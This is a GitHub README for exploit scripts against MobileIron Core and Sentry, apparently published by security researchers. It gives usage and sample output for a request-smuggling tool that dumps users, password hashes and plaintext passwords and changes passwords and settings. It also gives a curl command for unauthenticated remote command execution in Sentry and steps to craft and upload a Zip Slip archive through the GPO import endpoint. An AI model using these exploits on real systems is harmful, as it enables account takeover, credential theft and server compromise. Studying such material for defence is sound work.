Skip to content

Latest commit

 

History

History
124 lines (106 loc) · 9.05 KB

README.md

File metadata and controls

124 lines (106 loc) · 9.05 KB

Exploit scripts for MobileIron

More details in :

HTTP Request Smuggling in Core

  • Multiple interesting methods on Hessian service can be called
 Usage: mi_desync.py [OPTIONS] COMMAND [ARGS]...                                                                                                                                
                                                                                                                                                                                
╭─ Options ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ --help          Show this message and exit.                                                                                                                                  │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╭─ General options ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ *    -t      TEXT  The target URL [default: None] [required]                                                                                                                 │
│      -x      TEXT  HTTP proxy [default: (None)]                                                                                                                              │
│      -A      TEXT  User-Agent [default: Mozilla/5.0]                                                                                                                         │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
╭─ Commands ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╮
│ findLdapUsers                                                                                                                                                                │
│ getAllUsers                              Dump Users                                                                                                                          │
│ getLDAPConfigs                           Dump the LDAP configuration                                                                                                         │
│ getSettings                              Get multiple settings by ID (e.g 28,409)                                                                                            │
│ getSettingsByProperty                    e.g saveUserPassword,enterpriseName                                                                                                 │
│ retrieveUserPassword                     Retrieve plaintext password of a user                                                                                               │
│ setSaveUserPassword                      Multiple settings by property (e.g saveUserPassword,feature.flag.secret )                                                           │
│ storeUserPassword                        Change password of a user                                                                                                           │
╰──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╯
  • Dump all users
$ mi_desync.py -t https://micore.local getAllUsers | jq '.[] | {principal, email, passcode}'
[*] Calling : https://micore.local/ca/smuggle%3fa%20HTTP/1.1%0aUser-Agent:Mozilla%0aHost:127.0.0.1%0a%0aPOST%20/mifs/services/UserService...
[+] Got Hessian reply with object of type UserServiceResultDTO
{
"id": 9000,
"principal": "misystem",
"email": null,
"passcode": null,
"userSource": "L"
}
{
"id": 9001,
"principal": "admin",
"email": null,
"passcode": "V2;KyC4Z/jQI4zL0InyCtWZ2g==;F24/vblg/tAaIpwtbY5+PQ==",
"userSource": "L"
}
[...]
  • Enable the saveUserPassword setting
$ mi_desync.py -t https://micore.local  setSaveUserPassword 1
[*] Calling : https://micore.local/ca/smuggle%3fa%20HTTP/1.1%0aUser-Agent:Mozilla%0aHost:127.0.0.1%0a%0aPOST%20/mifs/services/SettingsService%20HTTP/1.1%0aX-Forwarded-For:127.0.0.1%0aA:B
[+] Got Hessian reply with object of type MISettingsResultDTO
[]

$ mi_desync.py -t https://micore.local  getSettingsByProperty saveUserPassword
[*] Calling : https://micore.local/ca/smuggle%3fa%20HTTP/1.1%0aUser-Agent:Mozilla%0aHost:127.0.0.1%0a%0aPOST%20/mifs/services/SettingsService%20HTTP/1.1%0aX-Forwarded-For:127.0.0.1%0aA:B
[+] Got Hessian reply with object of type tuple
[
    [
        {
            "miSettingId": 28,
            "property": "saveUserPassword",
            "value": "1",
            "uuid": null,
            "id": null,
            "principal": null,
            "deviceSpaceId": 1,
            "deviceSpacePath": "/1/",
            "modifiedAt": "11/01/2023, 01:01:01"
        }
    ]
]
  • Retrieve a user's password
$ mi_desync.py -t https://micore.local retrieveUserPassword ayrton                              
[*] Calling : https://micore.local/ca/smuggle%3fa%20HTTP/1.1%0aUser-Agent:Mozilla%0aHost:127.0.0.1%0a%0aPOST%20/mifs/services/UserService%20HTTP/1.1%0aX-Forwarded-For:127.0.0.1%0aA:B
[+] Got Hessian reply with object of type str
["SuperSecureADPassword123"]

Unauthenticated Remote Code Execution in Sentry

  • Call the uploadFileUsingFileInput method in MICSLogService to execute commands
$ curl -sk -H 'Content-Type: application/x-hessian' 'https://sentry1.local:8443/mics/services/MICSLogService' -v --data-binary @<(echo $(./mi_sentry_micslogservice.py "<CMD_LINE>") | base64 -d) 2>&1 " --output -

HRH isRunningTZ

Remote Arbitrary File Write via archive extraction (Zip Slip) in Core

  • Use genZip.java to craft Zip Slip archives
$ mkdir zipit

$ echo 1 > zipit/test.txt

$ javac genZip.java && java genZip
$ base64 -d genZip.out > payload.zip
$ unzip -l payload.zip
Archive:  payload.zip
  Length      Date    Time    Name
---------  ---------- -----   ----
        1  2023-08-01 10:16   ../../../../mi/tomcat/webapps/mifs/text.txt
  • Exploit the GPO import feature
$ curl -k https://micore.local/mifs/rest/api/v2/component/gpo/import -u 'admin:***' -H 'Referer: http://micore.local/' -F admxZipPackage=@zipslip/mi_zip/payload.zip
{"errors":null,"result":"Admx package successfully ingested","success":true}

Exchange Tabshell with Kerberos authentication

here